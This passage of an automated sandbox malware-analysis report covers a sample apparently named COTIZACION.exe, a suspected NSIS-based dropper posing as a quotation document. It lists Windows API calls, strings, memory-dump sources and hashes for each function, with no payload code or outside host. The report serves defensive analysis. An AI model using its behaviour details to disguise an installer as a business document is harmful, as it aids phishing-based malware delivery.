SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A4A88,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063FB
GlobalFree.KERNEL32(00000000), ref: 0040640D
CloseHandle.KERNEL32(00000000), ref: 00406414

Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\COTIZACION.exe,80000000,00000003), ref: 004068FD
Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

Strings

%ls=%ls, xrefs: 00406359
[Rename], xrefs: 004063C3, 004063D2

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2900126502-461813615
Opcode ID: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
Instruction ID: 9f7f24d6a9d8affb6c81019e1e78af230b3462d5c5472edf7d8bbe76e1c752c2
Opcode Fuzzy Hash: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
Instruction Fuzzy Hash: 1B3128B16012117BD7206B358D49F7B3A5CEF81749B06453EF943FA2C2DA7D88628A7C

Function 70022209 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 700212F8: GlobalAlloc.KERNELBASE(00000040,?,700211C4,-000000A0), ref: 70021302

GlobalFree.KERNEL32(00000000), ref: 700222F1
GlobalFree.KERNEL32(00000000), ref: 70022326

Strings

s<u, xrefs: 700222D0

Memory Dump Source

Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd

Similarity

API ID: Global$Free$Alloc
String ID: s<u
API String ID: 1780285237-779365171
Opcode ID: 54c028372ca542150d9af4261a1c7bace912ce94e428229afaefccb9d4f8de71
Instruction ID: 7f96d71bbdeb954ffcd8ab07b465d7aa119dc9fd293af1908d788f95d71b7297
Opcode Fuzzy Hash: 54c028372ca542150d9af4261a1c7bace912ce94e428229afaefccb9d4f8de71
Instruction Fuzzy Hash: 4531DE32100101FFE7268FA5ED84F6EB7BAFB45B32B300129F602D6161D7369999DB60

Function 00406D1B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D22
*?|<>/":, xrefs: 00406D7F
C:\Users\user\AppData\Local\Temp\, xrefs: 00406D1B, 00406D1D

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 589700163-776222514
Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
Instruction ID: 64caea1e5fba35c947d9094266ac5fc002638ab42ea644ca00d5fa91912821bd
Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
Instruction Fuzzy Hash: 7511D511B0063156DB30672A8C4097772E8DF69761756443BFDC6E32C0F77D8D9192B9

Function 00405739 Relevance: 12.1, APIs: 8, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00405756
GetSysColor.USER32 ref: 0040578F
SetTextColor.GDI32(?), ref: 004057A2
SetBkMode.GDI32(?,?), ref: 004057AE
GetSysColor.USER32(?), ref: 004057C2
SetBkColor.GDI32(?,?), ref: 004057D8
DeleteObject.GDI32(?), ref: 004057F4
CreateBrushIndirect.GDI32(?), ref: 004057FE

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
Instruction ID: 26ea8d1a65f0c358df8059d13c2b59527feb86654ff2728a298fdc5f00fd0ae6
Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
Instruction Fuzzy Hash: E221D675500B049FDB649F28DA4895BB7F4EF45711B108A3EE896A26A0DB38E814DF28

Function 0040362D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040364B
MulDiv.KERNEL32(00126870,00000064,00126870), ref: 00403673
wsprintfW.USER32 ref: 00403683
SetWindowTextW.USER32(?,?), ref: 00403693
SetDlgItemTextW.USER32(?,00000406,?), ref: 004036A5

Strings

verifying installer: %d%%, xrefs: 0040367D

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
Instruction ID: 44471e5cb11ab05bb0c6ce4c76b363bdac3f6882ce80e8a3b6daee8e8afc751d
Opcode Fuzzy Hash: 047d2cc0e248829387beeb5a8e07bbe74402e6ee51346e78a70c3337b09d8a04
Instruction Fuzzy Hash: BE018F71540208BBDF20AF60DE45BAA3B28A700305F00803AF642B51E0DBB58554CF4C

Function 700210C7 Relevance: 8.9, APIs: 7, Instructions: 162memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 7002116B
GlobalFree.KERNEL32(00000000), ref: 700211AE
GlobalFree.KERNEL32(00000000), ref: 700211CD
GlobalAlloc.KERNEL32(00000040,?), ref: 700211E6
GlobalFree.KERNEL32 ref: 7002125C
GlobalFree.KERNEL32(?), ref: 700212A7
GlobalFree.KERNEL32(00000000), ref: 700212BF

Memory Dump Source

Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: c38fe23532219c782df549f43b99878dda0a68fc496c5926a130745c3691ef64
Instruction ID: 5b1403470f0257959a54df1a4c9ae88cf6cabc081a387e62fd2c3738876a7451
Opcode Fuzzy Hash: c38fe23532219c782df549f43b99878dda0a68fc496c5926a130745c3691ef64
Instruction Fuzzy Hash: EA51BA72500201EFD710CF69EC80AAE77E9FB68B22B204569F94AD7361D731E915CB94

Function 70021F1E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 70021F51
lstrcpyW.KERNEL32(?,error,00001018,70021765,00000000,?), ref: 70021F71

Strings

callback%d, xrefs: 70021F4B
error, xrefs: 70021F67, 70021F6F
s<u, xrefs: 70021F51

Memory Dump Source

Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd

Similarity

API ID: lstrcpywsprintf
String ID: callback%d$error$s<u
API String ID: 2408954437-3671815815
Opcode ID: 09f60fcdaa538e109d5f7ab750ad9f60791295f8b7e6f2f19593b33027f2557f
Instruction ID: 135a1b4a07c3cd8661586b2a87fa0aaa5f964c3f1a4a3838a7a84e6bea79c879
Opcode Fuzzy Hash: 09f60fcdaa538e109d5f7ab750ad9f60791295f8b7e6f2f19593b33027f2557f
Instruction Fuzzy Hash: 45F08235204110AFD3048B04E988EBE73E6EF85721F1581A8FE5A97311C7B4AC818B91

Function 70022049 Relevance: 7.6, APIs: 5, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 700221BF

Part of subcall function 700212E1: lstrcpynW.KERNEL32(00000000,?,7002156A,?,700211C4,-000000A0), ref: 700212F1

GlobalAlloc.KERNEL32(00000040), ref: 7002212C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 7002214C

Memory Dump Source

Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 3562717f4ccf72c232665ad1fdddb6e26d2cd857cb373532633976aff65fbe33
Instruction ID: 0e47fa6a3ecd932a8c4dca6a6a71c636e9e70f77f9a0cdd09bb70caca6802b83
Opcode Fuzzy Hash: 3562717f4ccf72c232665ad1fdddb6e26d2cd857cb373532633976aff65fbe33
Instruction Fuzzy Hash: 1841F371405205FFC3119FB4EC84FEE77B9FB04B62BA0023DFA499A14AD7706591DAA0

Function 70021F7B Relevance: 7.5, APIs: 5, Instructions: 38memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000808,00000000,70022B4C,00000000,00000808), ref: 70021F8C
GlobalAlloc.KERNEL32(00000040,00000000), ref: 70021F97
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 70021FAB
GetProcAddress.KERNEL32(?,00000000), ref: 70021FB6
GlobalFree.KERNEL32(00000000), ref: 70021FBF

Memory Dump Source

Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 74514619470da0a281b810cb3f0625f6863a617b60f8bf6ab2b6db3637eb93a2
Instruction ID: a9ccd60bc8da06d12fa9bee9aecf5722f79b79c07a23df437a98741ec2b70a29
Opcode Fuzzy Hash: 74514619470da0a281b810cb3f0625f6863a617b60f8bf6ab2b6db3637eb93a2
Instruction Fuzzy Hash: B0F0AC33108118BFD6101BA7DC4CE57BE6CEB8B6FAB260255FB19D11A1C5B268818771

Function 00406534 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CA1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 0040653A
CharPrevW.USER32(?,00000000), ref: 00406545
lstrcatW.KERNEL32(?,004082B0), ref: 00406557

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406534

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-297319885
Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
Instruction ID: 997ea4b4438496dccce44eacbb2634370b3c3ae0899ac86cf6792f2d8b8f87b4
Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
Instruction Fuzzy Hash: F7D05E31102924AFC2026B58AE08D9B77ACEF46341341406EFAC1B3160CB745D5287ED

Function 70021CC7 Relevance: 6.2, APIs: 4, Instructions: 209COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 70021D37
GlobalFree.KERNEL32(?), ref: 70021DF2
GlobalFree.KERNEL32(00000000), ref: 70021DF5
__alldvrm.LIBCMT ref: 70021E2F

Memory Dump Source

Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd

Similarity

API ID: FreeGlobal$__alldvrm
String ID:
API String ID: 482422042-0
Opcode ID: 31395a117a85d5f977612584bcb3da6e72a52fd76127e202fb0de92e166157dc
Instruction ID: 1ec609fd4f0335b70da1f7339461fb1b0b4ee32efd86c70c828940593a58c829
Opcode Fuzzy Hash: 31395a117a85d5f977612584bcb3da6e72a52fd76127e202fb0de92e166157dc
Instruction Fuzzy Hash: 42510532608305CED7119E75BD805EEB6FBABE8E33B21492EF44383305E7A19D818291

Function 00403367 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00403378
GetTickCount.KERNEL32 ref: 00403397
CreateDialogParamW.USER32(0000006F,00000000,0040362D,00000000), ref: 004033B6
ShowWindow.USER32(00000000,00000005), ref: 004033C4

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
Instruction ID: 5fb2c38a213eff1d2f515c73fe307429b33afba48c29838db2cc379488067e45
Opcode Fuzzy Hash: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
Instruction Fuzzy Hash: C9F0F870551700EBDB209F60EF8EB163AA8B740B02F505579F941B51F0DB788514CA5C

Function 00405842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405852

Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

OleUninitialize.OLE32(00000404,00000000), ref: 0040589E

Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409

Strings

Misspending Setup: Installing, xrefs: 00405842

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: MessageSend$InitializeUninitialize
String ID: Misspending Setup: Installing
API String ID: 1011633862-1677686103
Opcode ID: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
Instruction ID: 8d413f420cbd2cda170a8e13f5886ccfc68e5e1a5fc2061566676394b2cd1e54
Opcode Fuzzy Hash: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
Instruction Fuzzy Hash: 97F09077800A008EE3416B54AD01B6777A4EBD1305F09C53EEE88A62A1DB794C628A5E

Function 00406CEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403436,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\COTIZACION.exe,C:\Users\user\Desktop\COTIZACION.exe,80000000,00000003), ref: 00406CF4
CharPrevW.USER32(?,00000000), ref: 00406D05

Strings

C:\Users\user\Desktop, xrefs: 00406CEE

Memory Dump Source

Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd

Similarity

API ID: CharPrevlstrlen
